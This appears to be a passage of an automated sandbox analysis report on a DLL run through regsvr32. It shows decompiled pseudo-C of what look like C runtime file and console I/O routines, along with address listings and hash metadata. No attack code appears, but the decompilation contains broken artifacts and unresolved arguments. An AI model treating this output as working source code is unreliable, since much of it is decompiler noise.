				E00007FFC7FFC130F3B9C(_t148, _t150, _t153, _t206, _t178, __rdx, _t277, _t279, _t292, _t290);
				_t149 = _t148 | 0x00000001;
				 *(_t279 - 0x59) = _t149;
				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + (( *__rdx & 0x0000003f) << 6) + 0x38) = _t149;
				_t229 =  *__rdx;
				_t187 =  *((intOrPtr*)(0x13124970 + (_t229 >> 6) * 8));
				 *((char*)(_t187 + ((_t229 & 0x0000003f) << 6) + 0x39)) = 0;
				if ((r12b & 0x00000002) == 0) goto 0x130f26b4;
				r13d = E00007FFC7FFC130F22B4(_t149, _t150, r12d, _t206, _t277);
				if (_t187 != 0) goto 0x130f26e3;
				asm("movups xmm0, [ebp-0x59]");
				asm("movsd xmm1, [ebp-0x31]");
				r8d = r12d;
				asm("movaps [ebp-0x1], xmm0");
				 *((char*)(_t279 - 0x61)) = 0;
				asm("movsd [ebp+0xf], xmm1");
				_t134 = E00007FFC7FFC130F1E14(_t150, _t206, _t279 - 1, _t277, _t279 - 0x61);
				if (_t187 == 0) goto 0x130f26f2;
				r13d = _t134;
				E00007FFC7FFC130F5278(_t150, r12d, _t152, _t187, _t187, _t206, _t277);
				goto 0x130f280e;
				 *((char*)( *((intOrPtr*)(0x13124970 + ( *_t275 >> 6) * 8)) + (( *_t275 & 0x0000003f) << 6) + 0x39)) =  *((intOrPtr*)(_t279 - 0x61));
				_t268 =  *_t275;
				_t270 = (_t268 & 0x0000003f) << 6;
				_t238 =  *((intOrPtr*)(0x13124970 + (_t268 >> 6) * 8));
				 *(_t238 + _t270 + 0x3d) =  *(_t238 + _t270 + 0x3d) & 0x000000fe;
				 *(_t238 + _t270 + 0x3d) =  *(_t238 + _t270 + 0x3d) | r12d & 0x00000001;
				if ((_t149 & 0x00000048) != 0) goto 0x130f2759;
				_t169 = r12b & 0x00000008;
				if (_t169 == 0) goto 0x130f2759;
				_t239 =  *_t275;
				_t193 =  *((intOrPtr*)(0x13124970 + (_t239 >> 6) * 8));
				 *(_t193 + ((_t239 & 0x0000003f) << 6) + 0x38) =  *(_t193 + ((_t239 & 0x0000003f) << 6) + 0x38) | 0x00000020;
				 *_t206 =  *_t206 >> 0xc1;
				if (_t169 != 0) goto 0x130f280c;
				if ((r12b & 0x00000001) == 0) goto 0x130f280c;
				CloseHandle(_t278);
				 *(_t282 + 0x30) =  *(_t282 + 0x30) & 0x00000000;
				asm("inc ecx");
				r8d =  *(_t279 - 0x11);
				 *(_t282 + 0x28) =  *(_t279 - 0x39);
				 *((long long*)(_t282 + 0x20)) =  *((intOrPtr*)(_t279 - 0x51));
				 *((intOrPtr*)(_t279 - 0x55)) = r14d;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t193 != 0xffffffff) goto 0x130f27f2;
				GetLastError();
				E00007FFC7FFC130EE630(_t150, _t193, _t206);
				 *( *((intOrPtr*)(0x13124970 + ( *_t275 >> 6) * 8)) + (( *_t275 & 0x0000003f) << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *_t275 >> 6) * 8)) + (( *_t275 & 0x0000003f) << 6) + 0x38) & 0x000000fe;
				_t144 = E00007FFC7FFC130F3DB0(_t149, _t150, _t152, _t206, _t275, _t277);
				goto 0x130f24bb;
				 *((long long*)( *((intOrPtr*)(0x13124970 + ( *_t275 >> 6) * 8)) + (( *_t275 & 0x0000003f) << 6) + 0x28)) = _t193;
				return _t144;
			}





































                                0x7ffc130f243c
                                0x7ffc130f243c
                                0x7ffc130f243f
                                0x7ffc130f2443
                                0x7ffc130f2447
                                0x7ffc130f2454
                                0x7ffc130f2458
                                0x7ffc130f245f
                                0x7ffc130f2465
                                0x7ffc130f2469
                                0x7ffc130f246c
                                0x7ffc130f2470
                                0x7ffc130f247a
                                0x7ffc130f247f
                                0x7ffc130f2482
                                0x7ffc130f2485
                                0x7ffc130f248a
                                0x7ffc130f2493
                                0x7ffc130f2497
                                0x7ffc130f249b
                                0x7ffc130f24a0
                                0x7ffc130f24a5
                                0x7ffc130f24ae
                                0x7ffc130f24b0
                                0x7ffc130f24b5
                                0x7ffc130f24b8
                                0x7ffc130f24bb
                                0x7ffc130f24c0
                                0x7ffc130f24c2
                                0x7ffc130f24c7
                                0x7ffc130f24cc
                                0x7ffc130f24d1
                                0x7ffc130f24d3
                                0x7ffc130f24d8
                                0x7ffc130f24db
                                0x7ffc130f24de
                                0x7ffc130f24e3
                                0x7ffc130f24e9
                                0x7ffc130f24eb
                                0x7ffc130f24ff
                                0x7ffc130f2502
                                0x7ffc130f2507
                                0x7ffc130f251a
                                0x7ffc130f251d
                                0x7ffc130f2520
                                0x7ffc130f2524
                                0x7ffc130f252f
                                0x7ffc130f2536
                                0x7ffc130f2539
                                0x7ffc130f253d
                                0x7ffc130f2543
                                0x7ffc130f2557
                                0x7ffc130f2560
                                0x7ffc130f2564
                                0x7ffc130f256a
                                0x7ffc130f256c
                                0x7ffc130f2579
                                0x7ffc130f257e
                                0x7ffc130f2582
                                0x7ffc130f2589
                                0x7ffc130f258d
                                0x7ffc130f2599
                                0x7ffc130f259f
                                0x7ffc130f25aa
                                0x7ffc130f25ac
                                0x7ffc130f25c4
                                0x7ffc130f25c8
                                0x7ffc130f25cd
                                0x7ffc130f25d5
                                0x7ffc130f25da
                                0x7ffc130f25e2
                                0x7ffc130f25ea
                                0x7ffc130f25ec
                                0x7ffc130f25f4
                                0x7ffc130f25f6
                                0x7ffc130f2617
                                0x7ffc130f261f
                                0x7ffc130f2627
                                0x7ffc130f262d
                                0x7ffc130f2632
                                0x7ffc130f2638
                                0x7ffc130f2643
                                0x7ffc130f2648
                                0x7ffc130f264d
                                0x7ffc130f264f
                                0x7ffc130f2657
                                0x7ffc130f2669
                                0x7ffc130f2677
                                0x7ffc130f267e
                                0x7ffc130f2682
                                0x7ffc130f2693
                                0x7ffc130f2697
                                0x7ffc130f26a0
                                0x7ffc130f26a9
                                0x7ffc130f26ae
                                0x7ffc130f26b4
                                0x7ffc130f26be
                                0x7ffc130f26c7
                                0x7ffc130f26ca
                                0x7ffc130f26ce
                                0x7ffc130f26d2
                                0x7ffc130f26d7
                                0x7ffc130f26de
                                0x7ffc130f26e0
                                0x7ffc130f26e5
                                0x7ffc130f26ed
                                0x7ffc130f270a
                                0x7ffc130f270e
                                0x7ffc130f271b
                                0x7ffc130f271f
                                0x7ffc130f272b
                                0x7ffc130f2730
                                0x7ffc130f2737
                                0x7ffc130f2739
                                0x7ffc130f273d
                                0x7ffc130f273f
                                0x7ffc130f2750
                                0x7ffc130f2754
                                0x7ffc130f2762
                                0x7ffc130f2765
                                0x7ffc130f276f
                                0x7ffc130f2778
                                0x7ffc130f2786
                                0x7ffc130f278c
                                0x7ffc130f2791
                                0x7ffc130f2795
                                0x7ffc130f279c
                                0x7ffc130f27a4
                                0x7ffc130f27b0
                                0x7ffc130f27bd
                                0x7ffc130f27bf
                                0x7ffc130f27c7
                                0x7ffc130f27e1
                                0x7ffc130f27e8
                                0x7ffc130f27ed
                                0x7ffc130f2807
                                0x7ffc130f282a

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                • String ID:
                                • API String ID: 1330151763-0
                                • Opcode ID: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction ID: 25588ca94b627607ef5f1f763dcafdefba288fa573b939a7fcf0709a7b59f7d7
                                • Opcode Fuzzy Hash: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction Fuzzy Hash: 31C1CD36B28E598AEB54CF64D9513AC37A5FB48BA8F014235CA2E677D5CF38E425C310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F5864 Relevance: 10.8, APIs: 7, Instructions: 294COMMON
                                Download Yara Rule
                                C-Code - Quality: 84%
                                			E00007FFC7FFC130F5864(void* __ebx, signed int __ecx, void* __edx, void* __ebp, long long* __rax, long long __rbx, long long __rdx, long long __r8) {
				signed char _t114;
				signed char _t115;
				void* _t119;
				void* _t134;
				void* _t140;
				intOrPtr _t146;
				char _t147;
				char _t148;
				void* _t152;
				void* _t153;
				unsigned int _t156;
				short _t157;
				void* _t161;
				long long* _t201;
				signed long long _t202;
				signed long long _t204;
				intOrPtr _t205;
				intOrPtr _t210;
				intOrPtr _t212;
				intOrPtr* _t221;
				long long* _t224;
				signed long long _t229;
				void* _t231;
				intOrPtr _t232;
				signed long long _t248;
				signed long long _t250;
				signed long long _t255;
				DWORD* _t257;
				short* _t264;
				void* _t272;
				void* _t277;
				signed long long _t280;
				void* _t282;
				signed long long _t283;
				long long* _t284;
				long long _t286;
				short* _t288;
				void* _t295;
				long _t299;
				void* _t301;
				void* _t304;
				void* _t306;
				signed long long _t308;
				char* _t309;
				char* _t310;

				_t286 = __r8;
				_t152 = __edx;
				 *((long long*)(_t282 + 0x18)) = __rbx;
				 *((long long*)(_t282 + 0x10)) = __rdx;
				_t283 = _t282 - 0x60;
				r12d = r8d;
				if (r13d != 0xfffffffe) goto 0x130f58a5;
				E00007FFC7FFC130EE680(__rax);
				 *__rax = 0;
				E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 9;
				goto 0x130f5cae;
				if (_t231 < 0) goto 0x130f5c97;
				_t161 = r13d -  *0x13124d70; // 0x40
				if (_t161 >= 0) goto 0x130f5c97;
				r8d = 1;
				 *((long long*)(_t283 + 0x48)) = __r8;
				_t280 = (__ecx & 0x0000003f) << 6;
				_t248 = __ecx >> 6;
				 *(_t283 + 0x40) = _t248;
				_t201 =  *((intOrPtr*)(0x13124970 + _t248 * 8));
				if (( *(_t201 + _t280 + 0x38) & r8b) == 0) goto 0x130f5c97;
				if (r12d - 0x7fffffff <= 0) goto 0x130f5911;
				E00007FFC7FFC130EE680(_t201);
				 *_t201 = 0;
				_t114 = E00007FFC7FFC130EE6A0(_t201);
				 *_t201 = 0x16;
				goto 0x130f5ca9;
				if (r12d == 0) goto 0x130f5c93;
				if (( *(_t201 + _t280 + 0x38) & 0x00000002) != 0) goto 0x130f5c93;
				if (__rdx == 0) goto 0x130f58fa;
				_t232 =  *((intOrPtr*)(_t201 + _t280 + 0x28));
				r10d =  *((char*)(_t201 + _t280 + 0x39));
				asm("retf 0x8844");
				_t202 = _t283;
				_t284 = _t201;
				_t115 = _t114 & 0x000000a0;
				 *_t202 =  *_t202 + _t115;
				 *((intOrPtr*)(_t232 + 0x2b)) =  *((intOrPtr*)(_t232 + 0x2b)) + _t115;
				asm("enter 0x1a74, 0x41");
				if ( *((intOrPtr*)(_t232 - 0x75)) != _t114) goto 0x130f5961;
				if ((r8b & r12d) == 0) goto 0x130f5976;
				r14d = r12d;
				goto 0x130f5a0c;
				_t204 =  !( !_t202);
				if ((r8b & r12d) != 0) goto 0x130f5992;
				E00007FFC7FFC130EE680(_t204);
				 *_t204 = 0;
				_t119 = E00007FFC7FFC130EE6A0(_t204);
				 *_t204 = 0x16;
				E00007FFC7FFC130EE580(_t119);
				goto 0x130f5b18;
				r14d = r12d;
				r14d = r14d >> 1;
				r14d =  <  ? _t153 : r14d;
				E00007FFC7FFC130EE154(_t204, _t232 - _t202);
				_t229 = _t204;
				E00007FFC7FFC130EE114(_t204, 0);
				E00007FFC7FFC130EE114(_t204, 0);
				_t308 = _t229;
				if (_t229 != 0) goto 0x130f59db;
				E00007FFC7FFC130EE6A0(_t204);
				 *_t204 = 0xc;
				E00007FFC7FFC130EE680(_t204);
				 *_t204 = 8;
				goto 0x130f5b18;
				r8d = 1;
				E00007FFC7FFC130F5D68(_t204, 0, 0);
				_t250 =  *(_t284 + 0x40);
				r10b =  *((intOrPtr*)(_t284 + 0xa0));
				r8d = 1;
				 *( *((intOrPtr*)(0x13124970 + _t250 * 8)) + _t280 + 0x30) = _t204;
				_t205 =  *((intOrPtr*)(0x13124970 + _t250 * 8));
				 *(_t284 + 0x50) = _t308;
				r9d = 0xa;
				if (( *(_t205 + _t280 + 0x38) & 0x00000048) == 0) goto 0x130f5aa1;
				_t146 =  *((intOrPtr*)(_t205 + _t280 + 0x3a));
				if (_t146 == r9b) goto 0x130f5aa1;
				if (r14d == 0) goto 0x130f5aa1;
				 *_t308 = _t146;
				r14d = r14d - 1;
				_t309 = _t308 + _t286;
				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t250 * 8)) + _t280 + 0x3a)) = r9b;
				if (r10b == 0) goto 0x130f5aa1;
				_t147 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t250 * 8)) + _t280 + 0x3b));
				if (_t147 == r9b) goto 0x130f5aa1;
				if (r14d == 0) goto 0x130f5aa1;
				 *_t309 = _t147;
				_t310 = _t309 + _t286;
				r14d = r14d - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t250 * 8)) + _t280 + 0x3b)) = r9b;
				if (r10b != r8b) goto 0x130f5aa1;
				_t148 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t250 * 8)) + _t280 + 0x3c));
				if (_t148 == r9b) goto 0x130f5aa1;
				if (r14d == 0) goto 0x130f5aa1;
				 *_t310 = _t148;
				_t156 = __rdx - 7;
				_t210 =  *((intOrPtr*)(0x13124970 + _t250 * 8));
				r14d = r14d - 1;
				 *((intOrPtr*)(_t210 + _t280 + 0x3c)) = r9b;
				E00007FFC7FFC130F3EE4(r13d, _t152, _t210);
				if (_t210 == 0) goto 0x130f5b36;
				_t212 =  *((intOrPtr*)(0x13124970 +  *(_t284 + 0x40) * 8));
				if (( *(_t212 + _t280 + 0x38) & 0x00000080) == 0) goto 0x130f5b36;
				GetConsoleMode(_t306);
				if (_t212 == 0) goto 0x130f5b36;
				if ( *((char*)(_t284 + 0xa0)) != 2) goto 0x130f5b3b;
				r14d = r14d >> 1;
				r8d = r14d;
				 *(_t284 + 0x20) = 0;
				ReadConsoleW(_t304, _t301, _t299, _t257, _t272);
				if (_t212 != 0) goto 0x130f5b2a;
				GetLastError();
				E00007FFC7FFC130EE630(r13d, _t212, _t229);
				E00007FFC7FFC130EE114(_t212, _t229);
				goto 0x130f5cb1;
				goto 0x130f5b76;
				 *((intOrPtr*)(_t284 + 0x48)) = sil;
				r8d = r14d;
				 *(_t284 + 0x20) = 0;
				ReadFile(_t277, ??, ??, ??);
				if ( *((intOrPtr*)(_t284 + 0xb8)) == 0) goto 0x130f5c5d;
				if ( *((intOrPtr*)(_t284 + 0xb8)) - r12d > 0) goto 0x130f5c5d;
				if (( *( *((intOrPtr*)(0x13124970 +  *(_t284 + 0x40) * 8)) + _t280 + 0x38) & 0x00000080) == 0) goto 0x130f5b1b;
				if ( *((char*)(_t284 + 0xa0)) == 2) goto 0x130f5bbf;
				_t255 = _t310 + _t286;
				 *(_t284 + 0x20) = _t299 >> 1;
				_t134 = E00007FFC7FFC130F5564(__ebx, r13d, _t156, _t255, _t156,  *((intOrPtr*)(_t284 + 0xa8)));
				goto 0x130f5b1b;
				if (_t134 == 0) goto 0x130f5c45;
				_t288 =  *(_t284 + 0x50);
				_t264 = _t288;
				_t295 = _t288 + (_t156 >> 1) * 2;
				if (_t288 - _t295 >= 0) goto 0x130f5c38;
				_t221 = _t288 + 2;
				if (r9w == 0x1a) goto 0x130f5c2f;
				if (r9w != 0xd) goto 0x130f5c18;
				if (_t221 - _t295 >= 0) goto 0x130f5c18;
				if ( *_t221 != _t157) goto 0x130f5c18;
				 *_t264 = _t157;
				goto 0x130f5c28;
				 *((intOrPtr*)(_t264 + 2)) = r9w;
				if (_t288 + 6 - _t295 < 0) goto 0x130f5beb;
				goto 0x130f5c38;
				_t224 =  *((intOrPtr*)(0x13124970 + _t255 * 8));
				 *(_t224 + _t280 + 0x38) =  *(_t224 + _t280 + 0x38) | 0x00000002;
				goto 0x130f5b1b;
				E00007FFC7FFC130F5334(r13d, _t156,  *(_t284 + 0x50), _t156 >> 1);
				goto 0x130f5bb8;
				GetLastError();
				if (_t224 != 5) goto 0x130f5c83;
				E00007FFC7FFC130EE6A0(_t224);
				 *_t224 = 9;
				E00007FFC7FFC130EE680(_t224);
				 *_t224 = 5;
				goto 0x130f5b18;
				if (_t224 != 0x6d) goto 0x130f5b11;
				goto 0x130f5b1b;
				goto 0x130f5cb1;
				E00007FFC7FFC130EE680(0);
				 *((long long*)(0)) = 0xa;
				_t140 = E00007FFC7FFC130EE6A0(0);
				 *((long long*)(0)) = 9;
				return E00007FFC7FFC130EE580(_t140);
			}
















































                                0x7ffc130f5864
                                0x7ffc130f5864
                                0x7ffc130f5864
                                0x7ffc130f5869
                                0x7ffc130f5879
                                0x7ffc130f5883
                                0x7ffc130f588a
                                0x7ffc130f588c
                                0x7ffc130f5893
                                0x7ffc130f5895
                                0x7ffc130f589a
                                0x7ffc130f58a0
                                0x7ffc130f58a9
                                0x7ffc130f58af
                                0x7ffc130f58b6
                                0x7ffc130f58bf
                                0x7ffc130f58c6
                                0x7ffc130f58ce
                                0x7ffc130f58d2
                                0x7ffc130f58dd
                                0x7ffc130f58e2
                                0x7ffc130f58eb
                                0x7ffc130f58f8
                                0x7ffc130f58fa
                                0x7ffc130f58ff
                                0x7ffc130f5901
                                0x7ffc130f5906
                                0x7ffc130f590c
                                0x7ffc130f5914
                                0x7ffc130f591f
                                0x7ffc130f5928
                                0x7ffc130f592a
                                0x7ffc130f5932
                                0x7ffc130f5944
                                0x7ffc130f5947
                                0x7ffc130f5947
                                0x7ffc130f5948
                                0x7ffc130f594a
                                0x7ffc130f594c
                                0x7ffc130f594f
                                0x7ffc130f5955
                                0x7ffc130f595f
                                0x7ffc130f5961
                                0x7ffc130f5967
                                0x7ffc130f596f
                                0x7ffc130f5974
                                0x7ffc130f5976
                                0x7ffc130f597b
                                0x7ffc130f597d
                                0x7ffc130f5982
                                0x7ffc130f5988
                                0x7ffc130f598d
                                0x7ffc130f5992
                                0x7ffc130f5995
                                0x7ffc130f599b
                                0x7ffc130f59a2
                                0x7ffc130f59a9
                                0x7ffc130f59ac
                                0x7ffc130f59b3
                                0x7ffc130f59b8
                                0x7ffc130f59be
                                0x7ffc130f59c0
                                0x7ffc130f59c5
                                0x7ffc130f59cb
                                0x7ffc130f59d0
                                0x7ffc130f59d6
                                0x7ffc130f59e0
                                0x7ffc130f59e4
                                0x7ffc130f59e9
                                0x7ffc130f59f5
                                0x7ffc130f59fd
                                0x7ffc130f5a07
                                0x7ffc130f5a0c
                                0x7ffc130f5a12
                                0x7ffc130f5a17
                                0x7ffc130f5a22
                                0x7ffc130f5a24
                                0x7ffc130f5a2b
                                0x7ffc130f5a30
                                0x7ffc130f5a32
                                0x7ffc130f5a35
                                0x7ffc130f5a3c
                                0x7ffc130f5a42
                                0x7ffc130f5a4a
                                0x7ffc130f5a50
                                0x7ffc130f5a57
                                0x7ffc130f5a5c
                                0x7ffc130f5a5e
                                0x7ffc130f5a69
                                0x7ffc130f5a6c
                                0x7ffc130f5a6f
                                0x7ffc130f5a77
                                0x7ffc130f5a7d
                                0x7ffc130f5a84
                                0x7ffc130f5a89
                                0x7ffc130f5a8b
                                0x7ffc130f5a8e
                                0x7ffc130f5a92
                                0x7ffc130f5a99
                                0x7ffc130f5a9c
                                0x7ffc130f5aa4
                                0x7ffc130f5aab
                                0x7ffc130f5abd
                                0x7ffc130f5ac6
                                0x7ffc130f5ad2
                                0x7ffc130f5ada
                                0x7ffc130f5ae4
                                0x7ffc130f5af3
                                0x7ffc130f5af9
                                0x7ffc130f5afc
                                0x7ffc130f5b01
                                0x7ffc130f5b09
                                0x7ffc130f5b0b
                                0x7ffc130f5b13
                                0x7ffc130f5b1e
                                0x7ffc130f5b25
                                0x7ffc130f5b34
                                0x7ffc130f5b36
                                0x7ffc130f5b48
                                0x7ffc130f5b4b
                                0x7ffc130f5b53
                                0x7ffc130f5b5b
                                0x7ffc130f5b69
                                0x7ffc130f5b8b
                                0x7ffc130f5b95
                                0x7ffc130f5ba5
                                0x7ffc130f5bae
                                0x7ffc130f5bb3
                                0x7ffc130f5bba
                                0x7ffc130f5bc6
                                0x7ffc130f5bc8
                                0x7ffc130f5bd6
                                0x7ffc130f5bd9
                                0x7ffc130f5be0
                                0x7ffc130f5be2
                                0x7ffc130f5bf4
                                0x7ffc130f5bfb
                                0x7ffc130f5c00
                                0x7ffc130f5c05
                                0x7ffc130f5c0b
                                0x7ffc130f5c16
                                0x7ffc130f5c18
                                0x7ffc130f5c2b
                                0x7ffc130f5c2d
                                0x7ffc130f5c2f
                                0x7ffc130f5c33
                                0x7ffc130f5c40
                                0x7ffc130f5c53
                                0x7ffc130f5c58
                                0x7ffc130f5c5d
                                0x7ffc130f5c66
                                0x7ffc130f5c68
                                0x7ffc130f5c6d
                                0x7ffc130f5c73
                                0x7ffc130f5c78
                                0x7ffc130f5c7e
                                0x7ffc130f5c86
                                0x7ffc130f5c8e
                                0x7ffc130f5c95
                                0x7ffc130f5c97
                                0x7ffc130f5c9c
                                0x7ffc130f5c9e
                                0x7ffc130f5ca3
                                0x7ffc130f5cc8

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                                • Instruction ID: d87aa89be38254d429dec8f1926e9f76cc9980d3ac39fc49bde44a9cb0598bb5
                                • Opcode Fuzzy Hash: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                                • Instruction Fuzzy Hash: 23C1F422A1CEAEC7EA648F10994027D6BD9BB80BE8F550174DA4E233D5CF3DD865C360
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130ED47C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction ID: af41ad1a353df793f28d0ed632af6f6e6ff1c393578a34c4022ff524bf2c32b2
                                • Opcode Fuzzy Hash: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction Fuzzy Hash: 0AF0C862B19F5696FF449B15F48027963A0EF8C7A8F541435D90F22664DF3CD494D320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F4AF8 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                Download Yara Rule
                                C-Code - Quality: 47%
                                			E00007FFC7FFC130F4AF8(signed long long __ecx, void* __edx, void* __esi, void* __ebp, void* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
				char _v64;
				signed long long _v72;
				void* _v84;
				unsigned int _v88;
				void* _v96;
				long long _v100;
				signed int _v104;
				signed int _v120;
				void* __rbp;
				void* _t74;
				void* _t75;
				void* _t94;
				intOrPtr _t95;
				void* _t96;
				void* _t102;
				void* _t107;
				void* _t128;
				signed long long _t142;
				intOrPtr _t144;
				long long* _t152;
				signed long long* _t154;
				intOrPtr _t162;
				signed short* _t183;
				void* _t185;
				signed long long _t194;
				void* _t195;
				signed long long _t197;
				signed long long _t198;
				signed long long _t200;
				void* _t201;
				signed short* _t202;

				_t192 = __r9;
				_t102 = __edx;
				_a32 = __rbx;
				r15d = r8d;
				_t194 = __ecx;
				_t183 = __rdx;
				if (r8d != 0) goto 0x130f4b26;
				goto 0x130f4dc1;
				if (__rdx != 0) goto 0x130f4b4a;
				E00007FFC7FFC130EE680(0);
				 *((long long*)(0)) = 0;
				_t74 = E00007FFC7FFC130EE6A0(0);
				 *((long long*)(0)) = 0x16;
				_t75 = E00007FFC7FFC130EE580(_t74);
				goto 0x130f4dc1;
				r14d = r14d & 0x0000003f;
				_t197 = _t194 >> 6;
				_t200 = _t194 << 6;
				_v72 = _t197;
				_t162 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
				_t95 =  *((intOrPtr*)(_t162 + _t200 + 0x39));
				if (_t75 - 1 > 0) goto 0x130f4b80;
				_t142 =  !(__rbx - 1);
				if ((r15d & 0x00000001) == 0) goto 0x130f4b2b;
				if (( *(_t162 + _t200 + 0x38) & 0x00000020) == 0) goto 0x130f4b96;
				r8d = 2;
				E00007FFC7FFC130F5D68(_t142, _t162, 0);
				_v88 = 0;
				E00007FFC7FFC130F3EE4(r12d, _t102, _t142);
				if (_t142 == 0) goto 0x130f4cab;
				_t144 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
				if (( *(0x13124970 + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4cab;
				E00007FFC7FFC130EF0D4(_t144, __rbx, _t162, 0, __r9);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0x90)) + 0x138)) != 0) goto 0x130f4bec;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t197 * 8)) + _t200 + 0x39)) == dil) goto 0x130f4cab;
				GetConsoleMode(??, ??);
				if (0x13124970 == 0) goto 0x130f4cab;
				if (_t95 == 0) goto 0x130f4c8d;
				_t96 = _t95 - 1;
				if (_t96 - 1 > 0) goto 0x130f4d48;
				_v104 = _v104 & 0;
				_t195 = _t183 + _t201;
				_t202 = _t183;
				_v100 = 0;
				if (_t183 - _t195 >= 0) goto 0x130f4d3e;
				r13d =  *_t202 & 0x0000ffff;
				if (E00007FFC7FFC130F633C(r13w & 0xffffffff) != r13w) goto 0x130f4c7b;
				_v100 = 2;
				if (r13w != 0xa) goto 0x130f4c70;
				r13d = 0xd;
				if (E00007FFC7FFC130F633C(r13d) != r13w) goto 0x130f4c7b;
				_v100 = 2;
				if ( &(_t202[1]) - _t195 >= 0) goto 0x130f4c84;
				goto 0x130f4c35;
				GetLastError();
				_v104 = 0x13124970;
				_t198 = _v72;
				goto 0x130f4d3e;
				r9d = r15d;
				E00007FFC7FFC130F446C(r12d, _t107, __esi, 3,  &_v104,  &_v64, _t183, _t192);
				asm("movsd xmm0, [eax]");
				goto 0x130f4d43;
				if (( *( *((intOrPtr*)(0x13124970 + _t198 * 8)) + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4d0b;
				_t128 = _t96;
				if (_t128 == 0) goto 0x130f4cf7;
				if (_t128 == 0) goto 0x130f4ce3;
				if (_t96 - 1 != 1) goto 0x130f4d48;
				r9d = r15d;
				E00007FFC7FFC130F477C(_t96, r12d, 0x13124970, 3,  &_v104, _t185, _t183);
				goto 0x130f4c9f;
				r9d = r15d;
				E00007FFC7FFC130F4898(r12d, _t107, 0x13124970, 3,  &_v104, _t185, _t183);
				goto 0x130f4c9f;
				r9d = r15d;
				E00007FFC7FFC130F4674(r12d, _t107, 0x13124970, 3,  &_v104, _t185, _t183);
				goto 0x130f4c9f;
				_v104 = _v104 &  *0x7FFC13124978;
